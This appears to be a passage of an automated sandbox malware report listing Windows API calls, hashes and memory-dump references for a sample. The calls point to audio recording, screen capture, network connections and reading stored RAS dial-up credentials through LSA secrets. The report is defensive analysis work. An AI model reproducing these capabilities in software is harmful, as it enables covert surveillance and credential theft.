                        • Instruction Fuzzy Hash: 8B21E7727403556BF328DB349C85B1B77E2EBC4B61F25861DFA52AB2D0CAF4AC04C618
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,1000803C,00000001), ref: 10008A94
                          • Part of subcall function 10008B40: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,1000803C,00000001), ref: 10008B64
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??3@CreateFile
                        • String ID:
                        • API String ID: 1804927778-0
                        • Opcode ID: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                        • Instruction ID: 2cbee5f73aa54b3bdbeea2601dca1461bf0f61acce64b1ebe15ca48bfbe30b26
                        • Opcode Fuzzy Hash: 582d5a0d7544c47434b001e0cd474194f736c7d2893807808bf8afdd30e53046
                        • Instruction Fuzzy Hash: D621FF76300301ABF300DBA4DC89F5AB7AAEBC5761F10852AF745DA2C0D7B1A8058731
                        APIs
                        • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F36A
                        • InterlockedExchange.KERNEL32(?,00000000), ref: 1000F372
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A253,000000FF,1000A00B), ref: 1000F380
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,1006A253,000000FF,1000A00B), ref: 1000F388
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A253,000000FF,1000A00B), ref: 1000F394
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,1006A253,000000FF,1000A00B), ref: 1000F39A
                        • DestroyCursor.USER32(?), ref: 1000F3C4
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseExchangeHandleInterlockedObjectSingleWait$CursorDestroy
                        • String ID:
                        • API String ID: 2236516186-0
                        • Opcode ID: 3ffa1f1c188cebbb19f655a76be77e1b952125273e2dd8129e9c19cd5186b017
                        • Instruction ID: a03e689654bc6474db5ec455c82bf0a822bd58bbdc9918214b3aa4310d428126
                        • Opcode Fuzzy Hash: 3ffa1f1c188cebbb19f655a76be77e1b952125273e2dd8129e9c19cd5186b017
                        • Instruction Fuzzy Hash: 02213B71200755ABD324EF59CC80B66B3A9FB89720F110B1EE56697790D7B5B9048B90
                        APIs
                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,1006A076,000000FF), ref: 1000D555
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D563
                        • RtlDeleteCriticalSection.NTDLL(?), ref: 1000D59C
                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,1006A076,000000FF), ref: 1000D5A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Library$AddressCriticalDeleteFreeLoadProcSection
                        • String ID: closesocket$ws2_32.dll
                        • API String ID: 1041861973-181964208
                        • Opcode ID: 68da6060db5162b1c40c0cf81342309e50d0ee96f82fe046d46d17e4307a4a01
                        • Instruction ID: 95d78208386eb911a1d3c0b03b10d253ff146846c36fede8dd456e9ff5a3265c
                        • Opcode Fuzzy Hash: 68da6060db5162b1c40c0cf81342309e50d0ee96f82fe046d46d17e4307a4a01
                        • Instruction Fuzzy Hash: 3011C271504B819FE340EF29CC44B5AB7E8FF45765F400B2EF965D3290DBB899048AA2
                        APIs
                        • lstrlen.KERNEL32(00000000,?,00000000,10007770,00000000), ref: 10007DC1
                        • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,10007770,00000000), ref: 10007DCA
                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,10007770,00000000), ref: 10007DD1
                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,10007770,00000000), ref: 10007DD9
                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,10007770,00000000), ref: 10007DEF
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 10007E02
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10007E09
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@ByteCharMultiWidelstrlen$??3@
                        • String ID:
                        • API String ID: 1676418047-0
                        • Opcode ID: 10c49fe91a4d5fdb5b5749182dffae639ca13a49863cddfe42f9b23efe61d36b
                        • Instruction ID: ee4b805df854161d3b647b4e454a37ef28bceacf17091f1f5db21fec8976eb02
                        • Opcode Fuzzy Hash: 10c49fe91a4d5fdb5b5749182dffae639ca13a49863cddfe42f9b23efe61d36b
                        • Instruction Fuzzy Hash: 84F02D7360126437F11065555C45F973A4DCB877F0F10023AF6149A1C1D4A47C1082B6
                        APIs
                          • Part of subcall function 10003950: RtlEnterCriticalSection.NTDLL(100027B0), ref: 10003958
                          • Part of subcall function 10003950: RtlLeaveCriticalSection.NTDLL(100027B0), ref: 10003971
                        • _ftol.MSVCRT ref: 1000407F
                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10004089
                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,1000175F,?,00000118,?,?,?,?,?,?), ref: 100040BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$??2@??3@EnterLeave_ftol
                        • String ID:
                        • API String ID: 2245774403-0
                        • Opcode ID: e54293974b624715fe12cb0dc13c47e8933b05d2789dbdde13171c2884a2995a
                        • Instruction ID: a0c423d738fcccbc95c9e89c39972746d0159de354ee6d97a2f82b004ae512e2
                        • Opcode Fuzzy Hash: e54293974b624715fe12cb0dc13c47e8933b05d2789dbdde13171c2884a2995a
                        • Instruction Fuzzy Hash: 2B41B4767043045BE705EE289C42A6F739DEBC4790F00492DF94597386EE75B90987A2
                        APIs
                        • GetStringTypeW.KERNEL32(00000001,0040642C,00000001,00000000,00000103,00000001,00000000,004043AC,00200020,00000000,?,00000000,00000000,00000001), ref: 0040514D
                        • GetStringTypeA.KERNEL32(00000000,00000001,00406428,00000001,?,?,00000000,00000000,00000001), ref: 00405167
                        • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004043AC,00200020,00000000,?,00000000,00000000,00000001), ref: 0040519B
                        • MultiByteToWideChar.KERNEL32(004043AC,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004043AC,00200020,00000000,?,00000000,00000000,00000001), ref: 004051D3
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405229
                        • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040523B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: StringType$ByteCharMultiWide
                        • String ID:
                        • API String ID: 3852931651-0
                        • Opcode ID: e16cf218f878321463a8e8b1036e6783c32adfa7d8257bd474d51601666a395d
                        • Instruction ID: 5652f6a01844cf5303c9984e54272d98c38225da9b9902f7ff6207b6633c277c
                        • Opcode Fuzzy Hash: e16cf218f878321463a8e8b1036e6783c32adfa7d8257bd474d51601666a395d
                        • Instruction Fuzzy Hash: EF415E72A40519AFCF209F94DC85EAF3BB9EF05750F10453AF911E6290D33989518FA8
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(?,0000005C,00000000,00000000,00000060,00000000,1000FEDA,?,?,00000001), ref: 100103FB
                        • GetDC.USER32(00000000), ref: 10010456
                        • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 10010463
                        • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10010476
                        • ReleaseDC.USER32(00000000,00000000), ref: 1001047F
                        • DeleteObject.GDI32(00000000), ref: 10010486
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@BitmapBitsCompatibleCreateDeleteObjectRelease
                        • String ID:
                        • API String ID: 1095915628-0
                        • Opcode ID: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                        • Instruction ID: e6d3d186e9f92d4220703d8de8e2d9e8fc21681ad3b0dafec7c560ae193a534e
                        • Opcode Fuzzy Hash: fe2484a2099eefb093cac069a7ef9955c01074e621ff64dc659aa541045317d5
                        • Instruction Fuzzy Hash: ED31D3716057418FE324CF29C8C4B5AFBE6FF85304F148A6DE1858B291E7B1A549CB50
                        APIs
                        • inet_addr.WS2_32(?), ref: 10005278
                        • gethostbyname.WS2_32(?), ref: 10005284
                        • inet_ntoa.WS2_32(?), ref: 100052AE
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000531C
                        • CloseHandle.KERNEL32(00000000), ref: 1000531F
                        • CreateThread.KERNEL32(00000000,00000000,100051C0,00000000,00000000,00000000), ref: 1000534B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: 6d62a0336c79163c41a223aefc3a73d3514f119283b0facb72b3c528266f5256
                        • Instruction ID: ffebca66319c31e60d9bee6de3fe6fdfc6b1e340fb59ae2c9b05118a375df363
                        • Opcode Fuzzy Hash: 6d62a0336c79163c41a223aefc3a73d3514f119283b0facb72b3c528266f5256
                        • Instruction Fuzzy Hash: 4821F7327007105BE328DB389C85B2B77E2EBC4761F65461DFA12A73D0CAF4AC04C618
                        APIs
                        • inet_addr.WS2_32(?), ref: 100050D8
                        • gethostbyname.WS2_32(?), ref: 100050E4
                        • inet_ntoa.WS2_32(?), ref: 1000510E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 1000517C
                        • CloseHandle.KERNEL32(00000000), ref: 1000517F
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004F90,00000000,00000000,00000000), ref: 100051A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: 7b31bc57488c21b9448efa7a1f7c517d3a80befe94aa6e989514a7f681d268ff
                        • Instruction ID: 64b3123e4827e47880a7ad7eb9077fc01f66ac603dc609927157346488c87272
                        • Opcode Fuzzy Hash: 7b31bc57488c21b9448efa7a1f7c517d3a80befe94aa6e989514a7f681d268ff
                        • Instruction Fuzzy Hash: B221F4326007105BE328DB389C85B6B77E2EBC4760F25861DFA56A73D0CAB49C04C618
                        APIs
                        • inet_addr.WS2_32(?), ref: 10004438
                        • gethostbyname.WS2_32(?), ref: 10004444
                        • inet_ntoa.WS2_32(?), ref: 1000446E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 100044DC
                        • CloseHandle.KERNEL32(00000000), ref: 100044DF
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004340,00000000,00000000,00000000), ref: 10004508
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: 9b45f0c775ecc02f906161811c12da30fc05bdbc321bbad7917fb322ab4d6f45
                        • Instruction ID: 133105fd9ebe25cdcd8a61e8cda3186f3284ea384c7f25d90d8eb6f3962d311d
                        • Opcode Fuzzy Hash: 9b45f0c775ecc02f906161811c12da30fc05bdbc321bbad7917fb322ab4d6f45
                        • Instruction Fuzzy Hash: 9B21C4727407105BE328DB389C85B2B76E2EBC4760F65862DFA56A73D0CEB4EC048658
                        APIs
                        • inet_addr.WS2_32(00000002), ref: 10004E58
                        • gethostbyname.WS2_32(00000002), ref: 10004E64
                        • inet_ntoa.WS2_32(?), ref: 10004E8E
                        • CreateThread.KERNEL32(00000000,00000000,Function_00004300,00000000,00000000,00000000), ref: 10004EFC
                        • CloseHandle.KERNEL32(00000000), ref: 10004EFF
                        • CreateThread.KERNEL32(00000000,00000000,10004D90,00000000,00000000,00000000), ref: 10004F28
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                        • String ID:
                        • API String ID: 772126777-0
                        • Opcode ID: a866d7493f76b98ae74ab5c581e095756d2892dbfad40d15de01bce8e6809222
                        • Instruction ID: ad2582a4ffcc604befb010a62af28e06a439adf0eb2a80410d096e25c1de9e61
                        • Opcode Fuzzy Hash: a866d7493f76b98ae74ab5c581e095756d2892dbfad40d15de01bce8e6809222
                        • Instruction Fuzzy Hash: 3321E2726007505BE328DB389C85B2B76E2FBC4760F668629FA52A72D0CAB49C048658
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,10003270,?,00000004,?), ref: 1000312E
                        • waveInOpen.WINMM(?,0000FFFF,?,00000000,00000000,00020000,?,00000004,?), ref: 10003150
                        • waveInPrepareHeader.WINMM(?,00000000,00000020,?,?,?,00000004,?), ref: 1000318D
                        • waveInAddBuffer.WINMM(?,?,00000020,?,?,?,00000004,?), ref: 100031A6
                        • ResumeThread.KERNEL32(?,?,?,00000020,?,?,?,00000004,?), ref: 100031B0
                        • waveInStart.WINMM(00000000,?,?,00000020,?,?,?,00000004,?), ref: 100031B9
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$Thread$BufferCreateHeaderOpenPrepareResumeStart
                        • String ID:
                        • API String ID: 1884298844-0
                        • Opcode ID: 9177b628c4b6b208b7eefd6788938319efd1fe7dbebfaa62c0514f18309c519f
                        • Instruction ID: c75628e9fec6ceadf22e6c1d5d7f93180dcfda44161ad2f40c2c2d0d32740965
                        • Opcode Fuzzy Hash: 9177b628c4b6b208b7eefd6788938319efd1fe7dbebfaa62c0514f18309c519f
                        • Instruction Fuzzy Hash: 5D2118B5240311AFE314CF68DC84F62BBA9FB8D710F208659F6459B685C771F855CBA0
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002E58
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002E61
                        • ??2@YAPAXI@Z.MSVCRT(000003E8), ref: 10002E88
                        • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8), ref: 10002E92
                        • ??2@YAPAXI@Z.MSVCRT(000003E8,00000020,000003E8), ref: 10002E9D
                        • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8,00000020,000003E8), ref: 10002EA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CreateEvent
                        • String ID:
                        • API String ID: 747899935-0
                        • Opcode ID: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                        • Instruction ID: 2b286f4346eb15344f540de0acd479cc32b4a22a8eccacb7838922c13c36a97c
                        • Opcode Fuzzy Hash: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                        • Instruction Fuzzy Hash: 86214CB0911B449FD324CF6AC984553FBF8FF89348750892EE1898BA51E3B6A845CB64
                        APIs
                        • GetVersionExA.KERNEL32 ref: 004030DB
                        • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403110
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403170
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: EnvironmentFileModuleNameVariableVersion
                        • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                        • API String ID: 1385375860-4131005785
                        • Opcode ID: 4cdc25b0e14a95a192e6cf68fc3eb2527211c1853bd0bdc13f119c00c0274926
                        • Instruction ID: 540452ff0e4977abba791a7d3beefe551e463797043e7728ed1094b193f1ab1f
                        • Opcode Fuzzy Hash: 4cdc25b0e14a95a192e6cf68fc3eb2527211c1853bd0bdc13f119c00c0274926
                        • Instruction Fuzzy Hash: 4B3125719412886DEB318F706C45BDA3F6C8B0A705F1404FBE185FA2C2E63D9F998719
                        APIs
                        • wsprintfA.USER32 ref: 100075CC
                          • Part of subcall function 10007340: LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 10007362
                        • LsaFreeMemory.ADVAPI32(?), ref: 100075FA
                        • LsaFreeMemory.ADVAPI32(?), ref: 10007624
                          • Part of subcall function 100073D0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,00000000), ref: 10007409
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeMemory$ByteCharMultiOpenPolicyWidewsprintf
                        • String ID: L$_RasDefaultCredentials#0$RasDialParams!%s#0
                        • API String ID: 3354934605-1591505386
                        • Opcode ID: 89401d473c1ae37d5d2ac9828142e643794bfa4f5db1d4a2d20f1e212a850289
                        • Instruction ID: 10d7f79d1800bdb995d923bc7ff5189c1fec0a70fd3281d4143c11dcb8492859
                        • Opcode Fuzzy Hash: 89401d473c1ae37d5d2ac9828142e643794bfa4f5db1d4a2d20f1e212a850289
                        • Instruction Fuzzy Hash: 83218079A047119BE314DF68D89096BB3E9FBCC700F00892CF98997341DA79ED458BD1
                        APIs
                        • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000003,00000080,00000000,?,00000001), ref: 100091DC
